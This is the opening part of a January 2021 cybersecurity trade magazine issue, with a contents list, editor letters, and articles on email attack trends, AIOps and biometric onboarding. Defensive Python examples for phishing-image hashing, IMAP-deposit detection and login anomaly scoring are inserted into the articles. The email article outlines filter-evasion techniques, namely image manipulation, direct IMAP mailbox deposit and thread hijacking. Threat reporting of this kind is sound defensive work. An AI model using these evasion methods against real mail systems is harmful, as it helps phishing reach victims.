
3 Email Hacking Techniques to Watch In 2021

5 AIOps Trends That Will Shape 2021

Zero Trust Remote Access for Engineering Teams

Communication Streaming Challenges

…and much more…

Cyber Defense eMagazine – January 2021 Edition 1 Copyright © 2021, Cyber Defense Magazine. All rights reserved worldwide.

CONTENTS

Welcome to CDM’s January 2021 Issue (p. 7)
3 Email Hacking Techniques to Watch In 2021 (p. 23) – By Adrien Gendre, Chief Product & Services Officer, Vade Secure
5 AIOps Trends That Will Shape 2021 (p. 26) – By Tej Redkar, Chief Product Officer at LogicMonitor
Securing Digital Identities in A Predominantly Remote World (p. 30) – By Bob Eckel, President & CEO, Aware, Inc.
Businesses Must Protect Their Most Critical Asset: Their Data (p. 33) – By Trevor J. Morgan, Ph.D., Product Manager at comforte AG
Zero Trust Remote Access for Engineering Teams (p. 36) – By Colin Rand, VP of Engineering, Banyan Security
Cryptocurrency Is on The Rise During COVID-19 – Here’s What Businesses of All Sizes Need to Know About Dealing with Attacks (p. 41) – By Marc Grens, Co-Founder & President at DigitalMint
E-Commerce and Lockdown: The Perfect Storm for Cyber Threats (p. 44) – By Aman Johal, Lawyer and Director of Your Lawyers
Communication Streaming Challenges (p. 47) – By Milica D. Djekic
Anatomy of a hack – Solar Winds Orion (p. 50) – By James Gorman, CISO, Authx
Cybersecurity Maturity Model Certification (CMMC) (p. 53) – By Carter Schoenberg, CISSP & CMMC Registered Practitioner, Vice President – Cybersecurity, SoundWay Consulting, Inc.
Businesses Should See Security as An Enabler of Digital Transformation, Not A Hindrance (p. 57) – By Matt Gyde, CEO, Security Division at NTT Ltd.
Asset Management, The Weakest Link in Cybersecurity Risk (p. 60) – By Gyan Prakash, Head of Cyber Security / Security Engineering, Altimetrik Corp
The Rising Tide of Security Threats in The Industrial Internet of Things (p. 70) – By Don Schleede, Information Security Officer at Digi International
E-Merchants: Secure Your Online Sales from Cybersecurity Threats (p. 73) – By Anthony Webb, EMEA Vice President, A10 Networks
The Privileged Credential Security Advantage (p. 76) – By Tony Goulding, Cybersecurity Evangelist at Centrify
How To Keep Your Children Safe In Remote Learning Situations (p. 79) – By Nevin Markwart, Chief Information Security Officer at FutureVault
More Internal Security Needed, Less Budget – 10 Tips to Help (p. 82) – By Jody Paterson, Founder and Executive Chairman, ERP Maestro
Personal Data Breaches for GDPR Compliance: Everything You Need to Know (p. 86) – By Dan May, Commercial Director, ramsac
Brave New World: Safari Content Blocking (p. 89) – By Andrey Meshkov, CEO and CTO at AdGuard
When Businesses Get Hacked – Who Are the Victims? (p. 93) – By Nicole Allen, Marketing Executive, SaltDNA
Security and Remote Management: What Is the Market Looking Like as We Head Towards 2021? (p. 97) – By Gil Pekelman, CEO, Atera
Working from Home? You’re Not Alone (p. 100) – By Steve Hanna, Embedded Systems Work Group Co-Chair at Trusted Computing Group (TCG) and Jun Takei, Japan Regional Forum Co-Chair at Trusted Computing Group
The Best Network Protection: Go Deep or Go Broad? (p. 104) – By Albert Zhichun Li, Chief Scientist, Stellar Cyber
Cybersecurity Predictions For 2021 (p. 106) – By Topher Tebow, Cybersecurity Analyst (Malware), Acronis
Why 'Thinking Small' Is the Way to Stop Ransomware and Other Cyber Attacks (p. 109) – By Yuval Baron, CEO at AlgoSec, who explains why micro-segmentation is one of the most effective methods to limit the damage of attacks on a network
Your Vulnerabilities are Making You Miss Your Misconfigurations (p. 112) – By Evan Anderson, Director of Offense, Randori
Are Your Organization’s Critical Assets Five Steps or Fewer from A Cyber Attacker? (p. 117) – By Gus Evangelakos, Director Field Engineering, XM Cyber
Moving to Active Defense: What It Means, How It Works and What You Can Do Now (p. 120) – By Ofer Israeli, CEO and founder, Illusive Networks
How Next-Gen Identity Governance and Administration (IGA) Fits in with Your Hybrid IT Strategy (p. 123) – By Thomas Müller-Martin, Global Partner Technical Lead, Omada
Analytics Security Insight On 2021 And Beyond (p. 126) – By Billy Spears, Chief Information Security Officer, Alteryx
Innovation, Automation and Securing A “Work from Anywhere” Environment In The Middle East (p. 129) – By Mazen A. Dohaji, Vice President, India, Middle East, Turkey & Africa (iMETA), LogRhythm
Peer-To-Peer Cybersecurity Insights For 2021 (p. 133) – By Stuart Berman, IT Central Station Super User
Transitioning to Remote Work: The Apps You’ll Need to Ensure A Productive Workforce (p. 135) – By Ikechukwu Nnabeze, SEO Copywriter, Traqq

Cyber Defense eMagazine – January 2021 Edition 4 Copyright © 2021, Cyber Defense Magazine. All rights reserved worldwide.

From the Publisher…

New CyberDefenseMagazine.com website, plus updates at CyberDefenseTV.com & CyberDefenseRadio.com

Dear Friends,

It’s a given that we are all ready to put 2020 behind us; executing plans for a much better, brighter year in 2021. For all your support, we humbly THANK YOU SO MUCH! We so much value our readers, our partners and our sponsors.

To be sure, there will be new challenges to take the place of the ones we’ve been facing for the past year. Publication and distribution of valuable actionable information is for us the key to successfully navigating these troubled waters.

As we’ve recently notched up to the 2nd most popular cybersecurity publication and news source, we’re proud to be entering our 9th year producing Cyber Defense Magazine as we continue to focus on providing valuable resources to our readers and sponsors, reaching the right kind of executives with our shared messages. Our readers include buyers, decision-makers, and influencers in the IT/InfoSec ecosystem.

As we publish this January issue, we look ahead to the year 2021 with great anticipation for new and exciting challenges and responses in the industry. The articles in this month’s Cyber Defense Magazine, which are provided from a broad array of contributors, demonstrate that our community continues to pursue a new phase, emphasizing basics while we address broader issues as well.

In addition to the important articles in the January issue, we are pleased to continue providing the powerful combination of monthly eMagazines, daily updates, and features on the Cyber Defense Magazine home page, and webinars featuring national and international experts on topics of current interest.

Finally, we’re answering the call to help fill so many infosec job openings, entering our second year of CDM Young Women in Cybersecurity Scholarships and with our new www.cyberdefenseprofessionals.com job portal – free to post a job opening or your resume, so please leverage it and let us know how to improve it in 2021 and beyond.

Warmest regards,

Gary S. Miliefsky, CISSP®, fmDHS
CEO, Cyber Defense Media Group
Publisher, Cyber Defense Magazine

P.S. When you share a story or an article or information about CDM, please use #CDM and @CyberDefenseMag and @Miliefsky – it helps spread the word about our free resources even more quickly.


CYBER DEFENSE eMAGAZINE

Published monthly by the team at Cyber Defense Media Group and distributed electronically via opt-in Email, HTML, PDF and Online Flipbook formats.

PRESIDENT & CO-FOUNDER
Stevin Miliefsky, [email protected]

INTERNATIONAL EDITOR-IN-CHIEF & CO-FOUNDER
Pierluigi Paganini, CEH, [email protected]

US EDITOR-IN-CHIEF
Yan Ross, JD, [email protected]

ADVERTISING
Marketing Team, [email protected]

CONTACT US:
Cyber Defense Magazine
Toll Free: 1-833-844-9468
International: +1-603-280-4451
SKYPE: cyber.defense
http://www.cyberdefensemagazine.com

Copyright © 2021, Cyber Defense Magazine, a division of CYBER DEFENSE MEDIA GROUP (a Steven G. Samuels LLC d/b/a)
276 Fifth Avenue, Suite 704, New York, NY 10001
EIN: 454-18-8465, DUNS# 078358935.
All rights reserved worldwide.

PUBLISHER
Gary S. Miliefsky, CISSP®
Learn more about our founder & publisher at: http://www.cyberdefensemagazine.com/about-our-founder/

9 YEARS OF EXCELLENCE! Providing free information, best practices, tips and techniques on cybersecurity since 2012, Cyber Defense Magazine is your go-to source for Information Security.

InfoSec Knowledge is Power. We will always strive to provide the latest, most up to date FREE InfoSec information.

We’re a proud division of Cyber Defense Media Group: Media Group, Consumer Magazine, B2B & B2G Magazine, TV, Radio, Awards, Professionals, Webinars.

From the International Editor-in-Chief…

With a new year before us, the international perspective on cybersecurity matters brings renewed emphasis on competition, privacy, and regulatory compliance. We see antitrust actions against several of the big tech leaders, updates of privacy rules among various jurisdictions, and new challenges from regulators.

On one hand, these trends are apparently intended to result in stronger cybersecurity overall. But in the usual manner, the law of unintended consequences often overrides good intentions.

The natural tension between anti-monopoly actions on one side and regulated monopoly market behavior on the other is playing out in the cybersecurity arena. And that interplay is complicated by the cross-jurisdictional nature of the industry.

A final challenging factor is that the world we live in today is a stage for nation-states and other governmental entities to exhibit multiple personalities: both as cooperating authorities in regulation and as competitors in exercising control over digital assets.

As always, we encourage cooperation and compatibility among nations and international organizations on cybersecurity, regulatory, and privacy matters.

To our faithful readers, we thank you,

Pierluigi Paganini
International Editor-in-Chief

P.S. Please visit our new consumer magazine for family and friends.

Welcome to CDM’s January 2021 Issue

From the U.S. Editor-in-Chief

As we enter a new year, it is important to pause and reflect on both the challenges and highlights of the year just past – from a cybersecurity perspective. In 2020, Cyber Defense Magazine carried nearly 300 articles of paramount value in identifying and responding to cybersecurity threats and opportunities.

Can our industry claim complete success (if that is even a fair question)? Perhaps not, but after all, we do operate in a theater of asymmetrical warfare: the defenders must bat 1000, while the attackers need only score the occasional base hit. Nonetheless, goals are worth setting and approaching as closely as possible.

From a more sanguine point of view, on behalf of Cyber Defense Magazine, we can state this without fear of contradiction: If all our readers were allowed to and funded to implement all the actionable advice of our contributors and sponsors, our overall cyber experience in 2020 would have been much improved. Let’s keep the pressure on the Boards, CEOs and CFOs about how important cyber hygiene has become. It’s not an insurance policy anymore; it’s a must-implement, daily and even more vigorously.

While we cannot change the past, we can surely learn from it. To that end, let me commend to our readers the contents of our January issue. The breadth and depth of this month’s articles cover various sources and topics, with a wealth of actionable information.

With that introduction, we are pleased to present the January 2021 issue of Cyber Defense Magazine.

Wishing you all success in your cyber security endeavors,

Yan Ross
US Editor-in-Chief
Cyber Defense Magazine

About the US Editor-in-Chief

Yan Ross, J.D., is a Cybersecurity Journalist & US Editor-in-Chief for Cyber Defense Magazine. He is an accredited author and educator and has provided editorial services for award-winning best-selling books on a variety of topics. He also serves as ICFE's Director of Special Projects, and the author of the Certified Identity Theft Risk Management Specialist® XV CITRMS® course. As an accredited educator for over 20 years, Yan addresses risk management in the areas of identity theft, privacy, and cyber security for consumers and organizations holding sensitive personal information. You can reach him via his e-mail address at [email protected]


3 Email Hacking Techniques to Watch In 2021

By Adrien Gendre, Chief Product & Services Officer, Vade Secure

Ransomware hobbled businesses in 2020, while COVID-19 spawned an endless stream of cyberattacks. What both have in common is email. With 91 percent of cyberattacks beginning with an email, a single click can mean the difference between business as usual and operations standstill. Here are three hacking techniques to watch out for in 2021.

1. Leveraging images to bypass email filters

Image quality might be critical to the authenticity of a phishing email, but it’s what’s going on behind the image that makes the difference between detection and delivery. Known phishing emails—or phishing emails that have been blacklisted—can find their way back into inboxes with a series of image manipulation techniques. Unfortunately, most email filters cannot detect them.


Invisible to the naked eye, images that have been even slightly manipulated cause a known phishing email to appear unique to an email filter. By distorting the color, tone, or geometry of an image, a hacker has the ability to update a blacklisted phishing email with a new image and bypass an email filter that can’t extract and analyze content from images.

Recently, we’ve been seeing an increase in the number of malicious emails containing remote-based images that store malicious textual content. Embedded in the body of the email but hosted on outside domains, remote images must be fetched over a network before they can be analyzed, so the process can’t be done in real time. In November alone, Vade Secure analyzed 26.2 million remote images and blocked 261.1 million emails containing remote images.

Extracting and analyzing content from images requires computer vision, an expensive, resource-intensive field of artificial intelligence that has yet to become standard in email security. Until then, we expect to see manipulated images and remote-based images grow.
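The detection gap described above comes down to how a filter identifies a "known" image. The following Python program is an added example (not code from the article or from Vade Secure) that contrasts an exact hash, which changes completely after a tone shift or a single-pixel edit, with a perceptual difference hash (dHash), which keeps such near-duplicates within a small Hamming distance of the blocklisted original. The grayscale image is a constructed pixel array so the script runs without an imaging library; the 9x8 thumbnail size and the distance threshold are assumed tuning values.

```python
"""Exact hashes vs. a perceptual hash (dHash) for near-duplicate image detection.

Added example, not the article's or Vade Secure's code. The "image" is a
constructed grayscale pixel array so the script runs without an imaging
library; in practice you would feed it a decoded attachment or remote image.
"""
import hashlib

WIDTH, HEIGHT = 18, 16     # constructed sample image size (a multiple of 9x8)
HASH_W, HASH_H = 9, 8      # dHash compares 8 adjacent pairs per row of a 9x8 thumbnail


def make_sample_image(seed=7):
    """Deterministic pseudo-random grayscale image (constructed sample data)."""
    pixels, state = [], seed
    for _ in range(HEIGHT):
        row = []
        for _ in range(WIDTH):
            state = (state * 1103515245 + 12345) % 2**31
            row.append(state % 200)  # stay below 200 so a small brightening never clips
        pixels.append(row)
    return pixels


def brighten(img, delta):
    """Uniform tone shift: invisible to a human, fatal to an exact hash."""
    return [[min(255, p + delta) for p in row] for row in img]


def alter_pixel(img, x, y, delta):
    """Touch a single pixel, another trivial way to produce a 'new' file."""
    out = [row[:] for row in img]
    out[y][x] = min(255, out[y][x] + delta)
    return out


def downscale(img, new_w, new_h):
    """Block-average downscale; the source must be a multiple of the target size."""
    h, w = len(img), len(img[0])
    bw, bh = w // new_w, h // new_h
    small = []
    for by in range(new_h):
        row = []
        for bx in range(new_w):
            block = [img[y][x]
                     for y in range(by * bh, (by + 1) * bh)
                     for x in range(bx * bw, (bx + 1) * bw)]
            row.append(sum(block) // len(block))
        small.append(row)
    return small


def dhash(img):
    """64-bit difference hash: bit = 1 where a pixel is darker than its right neighbour."""
    bits = 0
    for row in downscale(img, HASH_W, HASH_H):
        for x in range(HASH_W - 1):
            bits = (bits << 1) | (1 if row[x] < row[x + 1] else 0)
    return bits


def sha256_hex(img):
    """Exact hash of the raw pixel bytes, the kind a simple blocklist stores."""
    return hashlib.sha256(bytes(p for row in img for p in row)).hexdigest()


def hamming(a, b):
    """Number of differing bits between two hashes."""
    return bin(a ^ b).count("1")


def is_near_duplicate(candidate, known_bad, max_distance=10):
    """Blocklist lookup tolerant of small edits; max_distance is an assumed tuning value."""
    return any(hamming(candidate, bad) <= max_distance for bad in known_bad)


if __name__ == "__main__":
    original = make_sample_image()
    variants = {"brightened": brighten(original, 2),
                "one pixel": alter_pixel(original, 3, 4, 40)}
    blocklist = [dhash(original)]
    for name, img in variants.items():
        print(f"{name:10s} exact match: {sha256_hex(img) == sha256_hex(original)}  "
              f"dHash distance: {hamming(dhash(img), dhash(original))}  "
              f"near-duplicate: {is_near_duplicate(dhash(img), blocklist)}")
```

A uniform brightness change leaves every left/right comparison intact, so the dHash distance is zero while the SHA-256 digest is entirely new; editing one pixel disturbs at most the two comparisons that touch its thumbnail block. This is also why remote images defeat the approach in practice: the hash can only be computed once the image has been fetched, which is the latency problem the section describes.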

2. Depositing malicious emails via IMAP connections

In late November, Vade Secure detected a mass wave of spam emails being deposited into mailboxes without passing through transport layers. We suspect that the hacker or hackers used a new tool called Email Appender, which is available on the dark web, to deposit the spam.

Email Appender allows hackers to validate compromised account credentials and connect directly to the accounts via IMAP. Once connected, hackers can configure proxies to avoid detection and deposit emails directly into accounts, even in bulk. Because the emails are sent from compromised accounts, it’s not necessary for hackers to spoof the email addresses. However, they can adjust the sender display names to fit the narrative of the spam campaign.

We believe that hackers are using spam messages to test Email Appender and the IMAP method before moving on to phishing and malware attacks, which require more time, effort, and skill. Hackers tend to test new techniques on consumers before moving on to corporate targets. Business users are more savvy because of mandated security awareness training, and businesses tend to have more sophisticated security systems.

When the IMAP method goes corporate, we expect platforms like Microsoft 365 to become targets. API-based email security solutions that are natively integrated with Microsoft 365 offer post-delivery remediation capabilities not found in secure email gateways. If and when email threats bypass security, businesses can reach in and remove them, often before users have the chance to click.
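A message written straight into a mailbox never passed through the organisation's mail gateway, so it lacks the Received: header that gateway would have added; the article's other tell is a sender display name changed to fit the lure. The script below is an added example (not code from the article or from Vade Secure) that checks a message for both signals using the standard library's email parser. The gateway hostname, the directory of expected display names, and the two messages are constructed for the example.

```python
"""Flagging mailbox messages that arrived without a transport path.

Added example, not the article's or Vade Secure's code. A message deposited
directly over IMAP carries no Received: line from the organisation's gateway
because no MTA handled it. The hostname, directory and messages below are
constructed for the example.
"""
from email import message_from_string
from email.utils import parseaddr

TRUSTED_MTA = "mx.example.com"  # assumed: hostname our gateway writes into Received: lines

# Assumed directory of real display names for internal accounts.
DIRECTORY = {"alice@example.com": "Alice Example"}

# Constructed message that was delivered normally through the gateway.
DELIVERED = """\
Received: from mail.partner.example (mail.partner.example [203.0.113.5])
\tby mx.example.com with ESMTPS id 4abc; Mon, 4 Jan 2021 10:00:00 +0000
From: Alice Example <alice@example.com>
To: Bob Example <bob@example.com>
Subject: Q1 planning
Message-ID: <plan-1@example.com>

See attached agenda.
"""

# Constructed message written into the mailbox directly: no MTA touched it, and
# the display name on the compromised account was changed to fit the lure.
APPENDED = """\
From: IT Helpdesk <alice@example.com>
To: Bob Example <bob@example.com>
Subject: Password expiry notice
Message-ID: <notice-9@example.com>

Your password expires today. Follow the link to renew.
"""


def transport_findings(raw_message, trusted_mta=TRUSTED_MTA, directory=DIRECTORY):
    """Return a list of findings for one message; an empty list means nothing suspicious."""
    msg = message_from_string(raw_message)
    findings = []

    # Signal 1: delivery path. Every MTA that relays a message prepends a Received: line.
    received = msg.get_all("Received") or []
    if not received:
        findings.append("no Received headers: message never passed through an MTA")
    elif not any(trusted_mta in line for line in received):
        findings.append(f"no Received line from {trusted_mta}: gateway was bypassed")

    # Signal 2: display name. The address is genuine (compromised account), the name is not.
    display_name, address = parseaddr(msg.get("From", ""))
    expected = directory.get(address.lower())
    if expected and display_name and display_name != expected:
        findings.append(f"display name {display_name!r} does not match directory entry {expected!r}")
    return findings


if __name__ == "__main__":
    for label, raw in (("delivered", DELIVERED), ("appended", APPENDED)):
        print(label, transport_findings(raw) or ["ok"])
```

Apply the Received: rule to the Inbox only: copies a mail client saves into Sent or Drafts are also written with IMAP APPEND and legitimately lack a gateway Received: line. The server-side IMAP log is the stronger complement, since an APPEND to an Inbox from an address the account has never used is exactly the activity the article attributes to Email Appender.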


3. Hijacking email threads

When Emotet malware returned in July, it was made all the more difficult to detect due to thread hijacking. Leveraging user accounts already compromised by Emotet and other viruses, hackers injected themselves into legitimate email threads, spreading phishing links and malware-loaded Word documents as they posed as business colleagues and acquaintances.

While many users might be trained to inspect email for signs of spoofing, the average user is unlikely to scrutinize an email that is part of a thread. This is what makes thread hijacking so dangerous. With the conversation already established, hackers are free to converse with other users in the thread. And because their guard is down, users are likely to take the bait.

With a technique like thread hijacking, hackers can forgo border security and infiltrate a business from the inside. With the relative ease of getting inside, we expect thread hijacking to gain prominence in 2021.

Mitigating new threats

The above techniques prove that hackers are not only keeping up with the advances in email security but also outpacing it in many respects. Innovations in artificial intelligence bring new detection and remediation capabilities that will only grow in the coming years. But when threats do bypass security, continuous user training, including at the moment of need, will be critical to neutralizing attacks.

About the Author

Adrien Gendre is Chief Product & Services Officer at Vade Secure. His product vision and cybersecurity experience have been instrumental in Vade Secure’s evolution from startup to world leader in predictive email defense. A speaker at M3AAWG (Messaging, Malware & Mobile Anti-Abuse Working Group), Adrien is a sought-after email security expert who shares his expertise to educate businesses about email threats and facilitate new approaches in the cybersecurity community. With unparalleled access to global email threat intelligence, Adrien brings his email security expertise and innovative product approach to the ongoing development and advancement of phishing, spear phishing, and malware protection technologies at Vade Secure.


5 AIOps Trends That Will Shape 2021

By Tej Redkar, Chief Product Officer at LogicMonitor

If 2020 has taught us anything, it is that life is nothing if not unpredictable. Yet, the unforeseen possibilities of tomorrow are the very reasons why our society has fully embraced technology today. In the past decade, technology trends such as artificial intelligence (AI) and automation have improved us as a society by fostering faster collaboration and saving us a significant amount of time.

At the forefront of modern-day trends is AIOps, or the practice of using AI in IT Operations (ITOps). AIOps platforms combine big data and machine learning to find patterns, identify problems, and predict and prevent future issues from occurring. More recently, AIOps has been a valuable tool in helping companies scale high volumes of data due to the unprecedented shift to a remote workforce. As AIOps continues to grow in popularity, it’s important to keep up with key trends in its progression. The following reflects a variety of trends that I have my eye on for next year.

1. AIOps Is Moving from One Data Type to Multiple Data Type Algorithms

AIOps traditionally uses big data platforms to aggregate siloed IT Operations data in one place. Looking ahead, data scientists will be designing AI algorithms to converge multiple data types, such as metrics, logs and transactions, to draw a correlation and identify differences in the combined data. The trend emerged after various probabilistic methods, such as AI, machine learning and statistical analysis, were applied to metrics, logs and transactions. These actions allowed data scientists to draw a correlation between the data sets and filter out signal from noise so that organizations can troubleshoot issues faster.

When it comes to investing in AIOps, the ultimate goal is to save people time -- either through early warnings, filtering signal from noise, or automation -- so they can focus on more important problems rather than doing repetitive routine work. Many technology companies have already started investing in that trend.

2. Remote Work Is Driving More Technology Platforms to Deploy AI to Detect Problems

Remote work will be the legacy of 2020 and likely the new status quo moving forward. Prior to the coronavirus pandemic, data was typically concentrated in very specific areas due to collective working environments. Now that the pandemic has forced companies to support a remote workforce, every individual remote user is a data generator -- causing data volumes to skyrocket.

Monitoring employee productivity and digital continuity is crucial during these times, yet remains challenging for ITOps teams to manage. More intelligent algorithms are needed to predict issues with employee productivity or customer experience using the product remotely. This is where AI helps.

When it comes to AI, it doesn’t matter where users are working from. Once an algorithm is programmed, its only job is to ingest the data, extract intelligence, and then output the optimized value. The AI function can automate complex processing of disparate data sources and help IT teams predict problems before they occur by detecting patterns in large volumes of data.

3. AIOps will become more embedded in observability platforms

AIOps and observability will soon become counterparts to empower ITOps to do more in less time. Observability in IT refers to a system’s ability to gather actionable data and diagnose what’s happening, where it’s happening, and -- more importantly -- why an error or issue occurred within the system. This is done by combining monitoring, log analysis, and machine learning into an environment that can easily detect issues, proactively identify anomalies, and scale as necessary.

Observability platforms examine metrics, dependencies and logs, and bring them together into a unified platform to detect patterns between the different data types. This data provides greater observability into the customer experience, employee productivity, as well as digital infrastructure to help teams better understand how the business is performing.

After achieving observability, ITOps teams must answer the question of what to do with this information. That’s where AIOps comes in. By taking an algorithmic approach to ITOps combined with machine learning, IT teams can automate an influx of data to output actionable insights faster than ever before. AIOps platforms also enable their users to set dynamic thresholds, identify anomalies, and find the root cause of an issue. By embedding AIOps and observability into one unified platform, IT teams can predict problems faster and resolve them before it negatively impacts the business.


4. Security and IT Operations Will Be Better Integrated

As enterprise IT environments continue to mature, the need for advanced security platforms will inevitably follow. The fundamental data sets used in security platforms, including cybersecurity and product security, are almost the same as IT operations data sets. Security algorithms dissect the metrics and logs that flow through infrastructures to model historical behavioral patterns and flag anomalies. Using AI, this process can be further automated towards blocking bad actors in real time. For example, say a hacker is trying to penetrate a system, and the attempt is detected by either a change in the volume of data or a change in the location of the usual user. Security features can be used to classify that particular access as regular access, hacker access, or insecure access. Once the access is detected, automation systems can block the IP address of the hacker’s particular region or that particular range.

Regardless of the business problem, the underlying data required to gather this intelligence is still logs, metrics, and transactions within an infrastructure. The only difference is the problem that IT security teams are trying to solve. Security teams want to know whether a bad actor is trying to access the system, while ITOps teams are more interested in employing applications that will protect their users and provide a better customer experience. Next year, ITOps and Security teams will likely collaborate more closely to not only detect problems in the infrastructure performance, but also prevent cybersecurity threats in near real-time.
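The two signals named in this section, a change in data volume and a change in the user's usual location, together with the dynamic thresholds mentioned under trend 3, can be turned into a small classifier that an automated response could act on. The Python below is an added example (not LogicMonitor's or the article's code): it derives a threshold from the mean and standard deviation of the recent metric window, keeps a per-user history of sign-in locations, and labels each access as regular or anomalous with reasons. The hourly login counts, users, locations and the multiplier k are all constructed or assumed values.

```python
"""Dynamic threshold + location baseline for classifying access events.

Added example, not LogicMonitor's or the article's code. All metrics, users
and locations are constructed; k=3.0 is an assumed tuning value.
"""
import statistics

# Constructed baseline: hourly login counts for one account over the previous 24 hours.
BASELINE_COUNTS = [10, 12] * 12

# Constructed history of countries each user has previously signed in from.
KNOWN_LOCATIONS = {"alice": {"FR", "DE"}, "bob": {"US"}}


def dynamic_threshold(history, k=3.0):
    """Mean plus k population standard deviations of the recent window.

    Recomputed from the window each time, so the limit follows the real
    baseline instead of a hand-set static number.
    """
    return statistics.mean(history) + k * statistics.pstdev(history)


def classify_access(user, location, current_count, history=BASELINE_COUNTS,
                    known_locations=KNOWN_LOCATIONS, k=3.0):
    """Return ("regular", []) or ("anomalous", [reasons]) for one access event."""
    reasons = []
    limit = dynamic_threshold(history, k)
    if current_count > limit:                       # volume signal
        reasons.append(f"volume {current_count} exceeds dynamic threshold {limit:.1f}")
    if location not in known_locations.get(user, set()):  # location signal
        reasons.append(f"location {location} not in {user}'s history")
    return ("anomalous" if reasons else "regular", reasons)


def update_baseline(history, value, window=24):
    """Slide the metric window forward so the threshold adapts over time."""
    return (history + [value])[-window:]


if __name__ == "__main__":
    # Constructed stream of (user, location, logins this hour).
    events = [("alice", "FR", 13), ("alice", "KR", 60), ("bob", "US", 15), ("bob", "DE", 11)]
    history = BASELINE_COUNTS
    for user, location, count in events:
        status, reasons = classify_access(user, location, count, history)
        print(f"{user:6s} {location} {count:3d} -> {status} {reasons}")
        if status == "regular":               # only regular traffic feeds the baseline
            history = update_baseline(history, count)
```

Feeding only regular events back into the window (as the demo loop does) matters: if anomalous volumes were included, the threshold would drift upward and the attacker's activity would become the new normal. The blocking step the article describes would consume the returned reasons, for instance raising a block on the source range only when the volume signal fires.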

5. AIOps Platforms Will Decrease Time-to-Value

While AIOps platforms are meant to handle added complexity, humans are still required to configure and deploy them. Next year, AIOps capabilities will become more mainstream within products. SaaS products, in particular, will improve significantly with better actionable insights and new proactive capabilities within the product. This advancement will set the foundation for future integrated self-healing systems, which will further reduce the burden on human teams.

Properly educating employees on AIOps platforms also affects time-to-value. AIOps platforms are most efficient when they are managed by the right team. Investing in AIOps just to say you have it doesn’t add value to the business if IT isn’t sure how to use AIOps. Build a team that is cross-functional between the business, data owners, and engineers. Together, these three pillars will be able to derive real value out of any AIOps initiative.

I constantly see organizations driving initiatives tied to buzzwords instead of a real business problem. AIOps is about solving complex business problems, and, therefore, IT teams should identify the problems they want to overcome before diving in headfirst. Once that is understood across the board, solving problems using AI becomes easier. If organizations do not follow this basic advice, they will likely remain in a state of AI immaturity and will spend significant amounts of time on failed projects.


The Bottom Line

AIOps is a journey, not a quarterly goal or a yearly goal. From a business perspective, AIOps should be invested in for the long term, but only after knowing where the business stands within its own maturity journey.

About the Author

Tej Redkar has been building enterprise products for more than 20 years. He has led engineering, product management, user experience, and data science teams in industry-leading organizations like Microsoft, VMware, Cisco, and AppDynamics. Tej has consistently delivered highly successful products like Rational Rose, VMware Labs, Microsoft Azure Machine Learning, PowerBI, and AppDynamics that have fundamentally transformed people’s productivity in their respective domains. As Chief Product Officer, Tej brings the right balance of business and deep technical expertise to the team to drive strategy and execution at LogicMonitor. You can learn more about Tej Redkar and LogicMonitor at www.logicmonitor.com.


Securing Digital Identities in A Predominantly Remote World

COVID-19 and the subsequent uptick in targeted cyberattacks accelerate the need for biometric-based digital onboarding

By Bob Eckel, President & CEO, Aware, Inc.

As we entered 2020, organizations were beginning to undergo transformations to meet the growing demands of an increasingly digital marketplace. In adopting new technologies to streamline and accelerate business operations, banks and other consumer-focused businesses aimed to drive steady increases in biometric-based digital onboarding methods. These industries were striving to remove friction from onboarding processes at the same time as they needed to address growing security threat concerns, and biometrics were gaining trust as a secure, passwordless option for a broad range of authentication practices.

Then we witnessed the criticality of businesses reprioritizing their digital transformation processes as the impacts of the COVID-19 pandemic unfolded. As organizations across the world were forced to move their entire businesses online in the matter of weeks – some for the first time – they had to rapidly shift their business models to accommodate a predominantly remote workforce. With many unprepared to handle the IT and security challenges, identities became more vulnerable and in turn protection more valuable than ever. As 2021 kicks off, it’s important that businesses understand the benefits behind biometric-based digital onboarding to ensure organizational integrity as they continue to secure the digital identities of employees and customers alike.

Enhance remote authentication against increased cyber activity

Since the beginning of 2020, there have been more than 445 million cyberattacks reported, double the number for the entirety of 2019. When the pandemic forced millions of employees into remote work settings, it opened up huge opportunities for cybercriminals to take advantage of any security weak points with attacks aimed at stealing personally identifiable information (PII). In March alone, phishing attacks related to COVID-19 surged 667% as hackers aimed to separate consumers from their credentials, leveraging fraudulent pandemic-related information and many individuals’ initial entry into an all-online world to gain access. Still today, as the large majority of the world remains remote and people do more shopping, learning and working at home, hackers are looking harder for ways to take advantage of weakened security.

Biometrics make the identity proofing process more robust and secure. They can’t be stolen in the same manner as login credentials or lost like a password. They leverage unique personal data – such as face, voice, finger or iris prints – that people can store and then match later as a single- or multi-factor authentication process. With facial recognition being 99.7% accurate and improving yearly, according to NIST, biometrics provide that extra layer of defense to ensure identities remain protected. Even as threats increasingly target users who lack the security training to flag phishing emails and other related scams, their identities are more secure.

Ensure your customer is who they say they are by keeping fraudsters out

While facial recognition is a particularly useful biometric modality for mobile onboarding and authentication – with nearly all mobile devices having built-in cameras and microphones – the method is still vulnerable to so-called “presentation attacks” – otherwise known as “spoofs.” In short, a fraudster can try to spoof the biometric data on file by presenting a facsimile, such as a photo, video recording or mask. In mobile un-proctored onboarding, a fraudster can try to impersonate a victim using a false match presentation attack. In doing so, they can falsely use their victim’s identity to open a new account. By registering a false image – a picture of a random person, a smudged image that wouldn’t be biometrically searchable – a fraudster could work to open up new fake accounts.

To protect against these ploys, it’s essential to apply robust liveness detection when using facial recognition for unattended or un-proctored mobile applications. There are two ways of mitigating the risk of facial presentation attacks through liveness detection algorithms: by analyzing facial images to determine whether they are of a live human being or a reproduction, or by adding a second biometric modality, such as voice or speaker recognition. “Passive” liveness detection addresses this issue by distinguishing between a live person and a spoof without forcing the user to participate in the matching process.


Provide a touchless onboarding process to meet social-distancing guidelines

Part of the appeal of biometric authentication technologies during a pandemic or flu season is the touchless access they provide. Voice biometrics and face recognition enable hands-free authentication and access, eliminating the need to use on-site PIN pads, card readers or kiosks. To limit the spread of the virus, businesses need to shift more of their onboarding functions online. By focusing on implementing frictionless authentication processes through the use of biometrics, organizations can ensure that customers remain physically safe while still verifying that customers are who they claim to be when in-person verification is not an option.

Additionally, providing a positive onboarding experience can be a critical business differentiator. This is especially true for banks, which are facing pressure from online competitors and seeing their services commoditized. If they get the onboarding right, they can secure a customer’s loyalty for a lifetime. Forcing a customer to provide physical identification multiple times or answer too many questions can sour a relationship from the start. Biometrics work better in onboarding settings when they don’t slow the user down.

As the world continues to leverage technology to provide a more secure, seamless, and now touchless experience for users, we can anticipate biometrics will be a driving force. Growing at a faster rate than non-biometric technology, they will be instrumental in enterprises’ moves to make the onboarding process more efficient as organizations bring identity verification to the forefront of their business operations.

About the Author

